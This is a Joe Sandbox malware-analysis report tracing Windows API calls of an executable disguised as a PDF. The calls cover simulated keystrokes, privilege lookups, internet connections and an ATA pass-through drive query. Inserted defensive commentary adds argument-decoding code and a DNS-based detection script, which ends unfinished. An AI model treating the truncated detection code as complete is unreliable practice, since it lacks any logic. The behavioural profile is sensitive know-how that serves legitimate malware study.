                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _strlen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4218353326-0
APIs
• CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 007BBB09
• GetLastError.KERNEL32(?,00000000), ref: 007BBB2F
• DeleteFileW.KERNEL32(00000002,?,00000000), ref: 007BBB54
• CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 007BBB80
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
Similarity
• API ID: CreateHardLink$DeleteErrorFileLast
• String ID:
• API String ID: 3321077145-0
APIs
• InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 007D8B4D
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
Similarity
• API ID: InvalidateRect
• String ID:
• API String ID: 634782764-0
APIs
• ClientToScreen.USER32(?,?), ref: 007DAE1A
• GetWindowRect.USER32(?,?), ref: 007DAE90
• PtInRect.USER32(?,?,007DC304), ref: 007DAEA0
• MessageBeep.USER32(00000000), ref: 007DAF11
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
Similarity
• API ID: Rect$BeepClientMessageScreenWindow
• String ID:
• API String ID: 1352109105-0
APIs
• GetKeyboardState.USER32(?,00000000,?,00000001), ref: 007B1037
• SetKeyboardState.USER32(00000080,?,00000001), ref: 007B1053
• PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 007B10B9
• SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 007B110B
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
Similarity
• API ID: KeyboardState$InputMessagePostSend
• String ID:
• API String ID: 432972143-0
APIs
• GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 007B1176
• SetKeyboardState.USER32(00000080,?,00008000), ref: 007B1192
• PostMessageW.USER32(00000000,00000101,00000000), ref: 007B11F1
• SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 007B1243
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
Similarity
• API ID: KeyboardState$InputMessagePostSend
• String ID:
• API String ID: 432972143-0
APIs
• _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0078644B
• __isleadbyte_l.LIBCMT ref: 00786479
• MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 007864A7
• MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 007864DD
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
Similarity
• API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
• String ID:
• API String ID: 3058430110-0
APIs
• GetForegroundWindow.USER32 ref: 007D5189
  • Part of subcall function 007B387D: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 007B3897
  • Part of subcall function 007B387D: GetCurrentThreadId.KERNEL32 ref: 007B389E
  • Part of subcall function 007B387D: AttachThreadInput.USER32(00000000,?,007B52A7), ref: 007B38A5
• GetCaretPos.USER32(?), ref: 007D519A
• ClientToScreen.USER32(00000000,?), ref: 007D51D5
• GetForegroundWindow.USER32 ref: 007D51DB
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
Similarity
• API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
• String ID:
• API String ID: 2759813231-0
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00752612: GetWindowLongW.USER32(?,000000EB), ref: 00752623
                                                                                                                      • GetCursorPos.USER32(?), ref: 007DC7C2
                                                                                                                      • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0078BBFB,?,?,?,?,?), ref: 007DC7D7
                                                                                                                      • GetCursorPos.USER32(?), ref: 007DC824
                                                                                                                      • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0078BBFB,?,?,?), ref: 007DC85E
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2864067406-0
                                                                                                                      • Opcode ID: 6932b289cc2efdc15d531688da6272236f4abade2383d6e30c901b16efb5b8cd
                                                                                                                      • Instruction ID: 3e15fb40baebcffc30920b6ca75b808c8575c0e2805524fc4966dcb3e39f3a22
                                                                                                                      • Opcode Fuzzy Hash: 6932b289cc2efdc15d531688da6272236f4abade2383d6e30c901b16efb5b8cd
                                                                                                                      • Instruction Fuzzy Hash: 1931A835600018EFCB16CF98D898EEA7BBAFF49310F04416AF9468B261D7395D61EF60
                                                                                                                      APIs
                                                                                                                      • __setmode.LIBCMT ref: 00770BF2
                                                                                                                        • Part of subcall function 00755B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,007B7B20,?,?,00000000), ref: 00755B8C
                                                                                                                        • Part of subcall function 00755B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,007B7B20,?,?,00000000,?,?), ref: 00755BB0
                                                                                                                      • _fprintf.LIBCMT ref: 00770C29
                                                                                                                      • OutputDebugStringW.KERNEL32(?), ref: 007A6331
                                                                                                                        • Part of subcall function 00774CDA: _flsall.LIBCMT ref: 00774CF3
                                                                                                                      • __setmode.LIBCMT ref: 00770C5E
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 521402451-0
                                                                                                                      • Opcode ID: 3f07b1ca3471a318cb9e9ca8cdb7eb52cb9e84d4a83776725daaba5a16dff701
                                                                                                                      • Instruction ID: 5e9efb24b8272fe94738c64dd1c0947a65318d33796acfb796978e9fe7651024
                                                                                                                      • Opcode Fuzzy Hash: 3f07b1ca3471a318cb9e9ca8cdb7eb52cb9e84d4a83776725daaba5a16dff701
                                                                                                                      • Instruction Fuzzy Hash: B7112432A04208EACF05B3B89C4B9FE7B6D9F45360F14815AF20857192DF6D2D9687E5
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 007A8652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 007A8669
                                                                                                                        • Part of subcall function 007A8652: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 007A8673
                                                                                                                        • Part of subcall function 007A8652: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 007A8682
                                                                                                                        • Part of subcall function 007A8652: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 007A8689
                                                                                                                        • Part of subcall function 007A8652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 007A869F
                                                                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 007A8BEB
                                                                                                                      • _memcmp.LIBCMT ref: 007A8C0E
                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 007A8C44
                                                                                                                      • HeapFree.KERNEL32(00000000), ref: 007A8C4B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1592001646-0
                                                                                                                      • Opcode ID: 438b20641aaab932d97a4b679df1a9edb2c8e6c166588ae74b108a4f6dc51164
                                                                                                                      • Instruction ID: ff57969cfdde1334147c28c7e7c1c024bf31b285eebd5801d27a1bad98d5a1f6
                                                                                                                      • Opcode Fuzzy Hash: 438b20641aaab932d97a4b679df1a9edb2c8e6c166588ae74b108a4f6dc51164
                                                                                                                      • Instruction Fuzzy Hash: 26219F71D02208EFDB04DF94C944BEEB7B8EF81351F048199E455A7241DB39AE05CF61
                                                                                                                      APIs
                                                                                                                      • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 007C1A97
                                                                                                                        • Part of subcall function 007C1B21: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 007C1B40
                                                                                                                        • Part of subcall function 007C1B21: InternetCloseHandle.WININET(00000000), ref: 007C1BDD
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Internet$CloseConnectHandleOpen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1463438336-0
                                                                                                                      • Opcode ID: 5b2f448c5e6f2fce67a127b17e10655644abf39a0430c52b0af842e4bf44e176
                                                                                                                      • Instruction ID: a4c872dfc5be27c899c343778edb948085190a3a30d8e6bc605cbbd5fff12530
                                                                                                                      • Opcode Fuzzy Hash: 5b2f448c5e6f2fce67a127b17e10655644abf39a0430c52b0af842e4bf44e176
                                                                                                                      • Instruction Fuzzy Hash: 5321D171201600BFDB129F608C04FBBB7BDFF45710F54402EFA0696652EB39E8219BA4
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 007AF5AD: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,007AE1C4,?,?,?,007AEFB7,00000000,000000EF,00000119,?,?), ref: 007AF5BC
                                                                                                                        • Part of subcall function 007AF5AD: lstrcpyW.KERNEL32(00000000,?,?,007AE1C4,?,?,?,007AEFB7,00000000,000000EF,00000119,?,?,00000000), ref: 007AF5E2
                                                                                                                        • Part of subcall function 007AF5AD: lstrcmpiW.KERNEL32(00000000,?,007AE1C4,?,?,?,007AEFB7,00000000,000000EF,00000119,?,?), ref: 007AF613
                                                                                                                      • lstrlenW.KERNEL32(?,00000002,?,?,?,?,007AEFB7,00000000,000000EF,00000119,?,?,00000000), ref: 007AE1DD
                                                                                                                      • lstrcpyW.KERNEL32(00000000,?,?,007AEFB7,00000000,000000EF,00000119,?,?,00000000), ref: 007AE203
                                                                                                                      • lstrcmpiW.KERNEL32(00000002,cdecl,?,007AEFB7,00000000,000000EF,00000119,?,?,00000000), ref: 007AE237
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: lstrcmpilstrcpylstrlen
                                                                                                                      • String ID: cdecl
                                                                                                                      • API String ID: 4031866154-3896280584
                                                                                                                      • Opcode ID: 38f8c599afb046f0d49aa8520676788884d2c687d01dc9628faf8e6409adc37a
                                                                                                                      • Instruction ID: 705ce3db3c5302019a291d345b97f976e94d59160f5e6f70b66827445f923e93
                                                                                                                      • Opcode Fuzzy Hash: 38f8c599afb046f0d49aa8520676788884d2c687d01dc9628faf8e6409adc37a
                                                                                                                      • Instruction Fuzzy Hash: 1F119636200345EFCB25AF64DC49E7A77B8FF86350B40812AF816C7290EB799951D7A4
                                                                                                                      APIs
                                                                                                                      • _free.LIBCMT ref: 00785351
                                                                                                                        • Part of subcall function 0077594C: __FF_MSGBANNER.LIBCMT ref: 00775963
                                                                                                                        • Part of subcall function 0077594C: __NMSG_WRITE.LIBCMT ref: 0077596A
                                                                                                                        • Part of subcall function 0077594C: RtlAllocateHeap.NTDLL(018F0000,00000000,00000001,00000000,?,?,?,00771013,?), ref: 0077598F
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocateHeap_free
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 614378929-0
                                                                                                                      • Opcode ID: 926472666984626d7a06664ae4e4ff246389fcb003e8f4f831e3229250ba0347
                                                                                                                      • Instruction ID: 92ce8ca03c12e428b69644e367a60fa52d18e66ea345c30f2cf548f5755ae29d
                                                                                                                      • Opcode Fuzzy Hash: 926472666984626d7a06664ae4e4ff246389fcb003e8f4f831e3229250ba0347
                                                                                                                      • Instruction Fuzzy Hash: D7112332684E05EFCF313F70EC0C65E3B98AF143E8B20852AF9099A491DFBD89409790
                                                                                                                      APIs
                                                                                                                      • _memset.LIBCMT ref: 00754560
                                                                                                                        • Part of subcall function 0075410D: _memset.LIBCMT ref: 0075418D
                                                                                                                        • Part of subcall function 0075410D: _wcscpy.LIBCMT ref: 007541E1
                                                                                                                        • Part of subcall function 0075410D: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 007541F1
                                                                                                                      • KillTimer.USER32(?,00000001,?,?), ref: 007545B5
                                                                                                                      • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 007545C4
                                                                                                                      • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0078D6CE
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
• Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
Similarity
• API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
• String ID:
• API String ID: 1378193009-0
• Opcode ID: ffeb508cf1b732501988f086e6f10bab6023652950fcd882079ec10eeed5d37e
• Instruction ID: f4e9c36a649ed4d68c4c08f6c57ac831eda8478508fd8797f4118622032a95f2
• Opcode Fuzzy Hash: ffeb508cf1b732501988f086e6f10bab6023652950fcd882079ec10eeed5d37e
• Instruction Fuzzy Hash: DF210A705447889FEB329B24DC49BE7BBECAF01319F00409EE69E56181D7B81E88CB51
APIs
• CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 007B40D1
• _memset.LIBCMT ref: 007B40F2
• DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 007B4144
• CloseHandle.KERNEL32(00000000), ref: 007B414D
Memory Dump Source
• Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
• Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
Similarity
• API ID: CloseControlCreateDeviceFileHandle_memset
• String ID:
• API String ID: 1157408455-0
• Opcode ID: fb14be002550a8f8a5d56ce72a00ba572f90e1f784fb9801547e590268e4918a
• Instruction ID: f49cfec486091bdee627f7488fe0fbecc47c479e1ed4cf5473dd6b322a738334
• Opcode Fuzzy Hash: fb14be002550a8f8a5d56ce72a00ba572f90e1f784fb9801547e590268e4918a
• Instruction Fuzzy Hash: C811987590122C7AD7305AA59C4DFEBBB7CEB44760F104196F908D7180D6744E808BA4
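The CreateFileW/DeviceIoControl pair in this entry says more once the numeric arguments are decoded. The following is an added example, not part of the Joe Sandbox report: a parser for the API lines in this listing plus a decoder for the CreateFileW flags and for the I/O control code (field layout from the winioctl.h CTL_CODE macro, named codes from ntddscsi.h; the KNOWN_IOCTLS table is a deliberately small lookup, not a complete one). The device path is unresolved ("?") in the report, so it is not known here; the reading that a 512-byte out-buffer on an ATA pass-through is an IDENTIFY DEVICE block, i.e. a read of drive model/serial data, is an inference from the argument values and not something the report states.

```python
# Added example (not from the Joe Sandbox report): parse the API lines of the
# entry above and decode the DeviceIoControl / CreateFileW arguments they carry.
import re

# Field layout of a Windows I/O control code (winioctl.h CTL_CODE macro):
#   DeviceType << 16 | Access << 14 | Function << 2 | Method
METHOD_NAMES = {0: "METHOD_BUFFERED", 1: "METHOD_IN_DIRECT",
                2: "METHOD_OUT_DIRECT", 3: "METHOD_NEITHER"}
ACCESS_NAMES = {0: "FILE_ANY_ACCESS", 1: "FILE_READ_ACCESS",
                2: "FILE_WRITE_ACCESS", 3: "FILE_READ_ACCESS|FILE_WRITE_ACCESS"}
# Small lookup of SCSI/ATA pass-through codes (values from ntddscsi.h); not complete.
KNOWN_IOCTLS = {
    0x4D004: "IOCTL_SCSI_PASS_THROUGH",
    0x4D014: "IOCTL_SCSI_PASS_THROUGH_DIRECT",
    0x4D02C: "IOCTL_ATA_PASS_THROUGH",
    0x4D030: "IOCTL_ATA_PASS_THROUGH_DIRECT",
}
GENERIC_READ, GENERIC_WRITE = 0x80000000, 0x40000000
DISPOSITIONS = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
                4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}

# Shape of one report line: "Api.MODULE(arg,arg,?), ref: 0040ABCD"
API_LINE = re.compile(r"(\w+)\.(\w+)\((.*?)\),\s*ref:\s*([0-9A-Fa-f]+)")


def parse_api_line(line):
    """Return {'api','module','args','ref'} for a report line; '?' becomes None."""
    m = API_LINE.search(line)
    if not m:
        return None  # lines without an argument list (e.g. "_memset.LIBCMT ref: ...")
    name, module, args, ref = m.groups()
    values = [None if a.strip() == "?" else int(a, 16) for a in args.split(",")]
    return {"api": name, "module": module, "args": values, "ref": int(ref, 16)}


def decode_ioctl(code):
    """Split a control code into its CTL_CODE fields and name it if known."""
    return {
        "device_type": (code >> 16) & 0xFFFF,
        "access": ACCESS_NAMES[(code >> 14) & 0x3],
        "function": (code >> 2) & 0xFFF,
        "method": METHOD_NAMES[code & 0x3],
        "name": KNOWN_IOCTLS.get(code, "unknown"),
    }


def decode_create_file(args):
    """args follow CreateFileW(lpFileName, dwDesiredAccess, dwShareMode,
    lpSecurityAttributes, dwCreationDisposition, dwFlagsAndAttributes, hTemplateFile)."""
    access, share, disposition = args[1], args[2], args[4]
    names = [n for n, bit in (("GENERIC_READ", GENERIC_READ),
                              ("GENERIC_WRITE", GENERIC_WRITE)) if access & bit]
    return {"access": "|".join(names), "share_mode": share,
            "disposition": DISPOSITIONS.get(disposition, hex(disposition))}


def summarize(listing):
    """Collect what a CreateFileW/DeviceIoControl pair in a listing tells us."""
    out = {}
    for line in listing:
        call = parse_api_line(line)
        if call is None:
            continue
        if call["api"] == "CreateFileW":
            out["open"] = decode_create_file(call["args"])
        elif call["api"] == "DeviceIoControl":
            # DeviceIoControl(hDevice, dwIoControlCode, lpIn, nIn, lpOut, nOut, ...)
            out["ioctl"] = decode_ioctl(call["args"][1])
            out["in_size"], out["out_size"] = call["args"][3], call["args"][5]
    return out


# The four API lines of the entry above, copied from the report.
LISTING = [
    "• CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 007B40D1",
    "• _memset.LIBCMT ref: 007B40F2",
    "• DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 007B4144",
    "• CloseHandle.KERNEL32(00000000), ref: 007B414D",
]

if __name__ == "__main__":
    print(summarize(LISTING))
```

summarize(LISTING) reports an OPEN_EXISTING open with GENERIC_READ|GENERIC_WRITE and full sharing, control code IOCTL_ATA_PASS_THROUGH (device type 4, function 0x40B, METHOD_BUFFERED) and 0x200-byte input and output buffers. That combination is what a direct ATA IDENTIFY DEVICE request through the storage stack looks like; treat the identity-read interpretation as a hypothesis to confirm against the device path, which the report does not resolve.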
APIs
  • Part of subcall function 00755B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,007B7B20,?,?,00000000), ref: 00755B8C
  • Part of subcall function 00755B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,007B7B20,?,?,00000000,?,?), ref: 00755BB0
• gethostbyname.WSOCK32(?,?,?), ref: 007C66AC
• WSAGetLastError.WSOCK32(00000000), ref: 007C66B7
• _memmove.LIBCMT ref: 007C66E4
• inet_ntoa.WSOCK32(?), ref: 007C66EF
Memory Dump Source
• Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
• Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
Similarity
• API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
• String ID:
• API String ID: 1504782959-0
• Opcode ID: 7290387a05b7e3a77a836f0a3ec408b2b5805fb116f532d4e1cfed35d18539da
• Instruction ID: a2221a05c97807613c7602ea4d253e070ded1c8d95aa56669f2864bbcbb6e211
• Opcode Fuzzy Hash: 7290387a05b7e3a77a836f0a3ec408b2b5805fb116f532d4e1cfed35d18539da
• Instruction Fuzzy Hash: D9119375900508EFCB00EBA4DD9ADEE77B8BF04311B048129F906A7161DF78AF04DBA1
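This entry is a hostname-to-IPv4 helper: the wide name is narrowed with WideCharToMultiByte, passed to gethostbyname (which returns NULL on failure, with WSAGetLastError supplying the reason, for instance 11001 WSAHOST_NOT_FOUND), and an address from the result is copied out and rendered with inet_ntoa. Driven in a loop over a list of candidate names of which few or none exist, a helper like this leaves a recognisable trail in DNS telemetry. The detection below is an added example, not part of the report: it runs over constructed Sysmon-style Event ID 22 (DnsQuery) records, where QueryStatus 0 means the name resolved and 9003 (DNS_ERROR_RCODE_NAME_ERROR) means NXDOMAIN; the image paths, names and the two thresholds are illustrative choices, not tuned values.

```python
# Added example (not from the Joe Sandbox report): flag processes that resolve
# many distinct names of which almost none exist, the trail a looped
# gethostbyname helper leaves in DNS-query telemetry.
import re
from collections import defaultdict

# Constructed Sysmon-style Event ID 22 (DnsQuery) records; not real telemetry.
# QueryStatus 0 = resolved; 9003 = DNS_ERROR_RCODE_NAME_ERROR (NXDOMAIN).
SAMPLE_LOG = r"""
Image=C:\Users\user\Desktop\sample.exe QueryName=alpha-one.invalid QueryStatus=9003
Image=C:\Users\user\Desktop\sample.exe QueryName=beta-two.invalid QueryStatus=9003
Image=C:\Users\user\Desktop\sample.exe QueryName=gamma-three.invalid QueryStatus=9003
Image=C:\Users\user\Desktop\sample.exe QueryName=delta-four.invalid QueryStatus=9003
Image=C:\Users\user\Desktop\sample.exe QueryName=epsilon-five.invalid QueryStatus=9003
Image=C:\Users\user\Desktop\sample.exe QueryName=www.example.com QueryStatus=0
Image=C:\Browser\browser.exe QueryName=www.example.com QueryStatus=0
Image=C:\Browser\browser.exe QueryName=cdn.example.net QueryStatus=0
Image=C:\Browser\browser.exe QueryName=typo.example.org QueryStatus=9003
Image=C:\Windows\System32\svchost.exe QueryName=time.example.com QueryStatus=0
Image=C:\Windows\System32\svchost.exe QueryName=update.example.com QueryStatus=0
"""

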